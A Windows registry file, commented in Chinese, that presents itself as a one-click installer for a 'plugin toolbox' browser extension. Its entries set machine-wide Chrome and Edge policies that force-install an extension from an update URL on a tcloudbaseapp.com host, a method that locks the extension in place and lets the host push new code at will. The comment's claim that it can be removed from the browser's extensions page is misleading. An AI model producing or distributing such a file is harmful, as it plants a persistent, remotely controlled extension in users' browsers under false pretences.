Windows Registry Editor Version 5.00

; ============================================================
; 插件工作箱 v2.2.103 — Chrome + Edge 一键安装
; ============================================================
; 使用方法：双击此文件 → 点"是" → 重启浏览器 → 自动安装
; 卸载方法：浏览器扩展页删除 + regedit 删除对应注册表项
; ============================================================

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]
"1"="nmpdifejooglhkcilhgjkhggbioalojk;https://renewal-calendar-7ff2rtj4f876144-1259283480.tcloudbaseapp.com/extensions/toolbox/update.xml"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist]
"1"="nmpdifejooglhkcilhgjkhggbioalojk;https://renewal-calendar-7ff2rtj4f876144-1259283480.tcloudbaseapp.com/extensions/toolbox/update.xml"
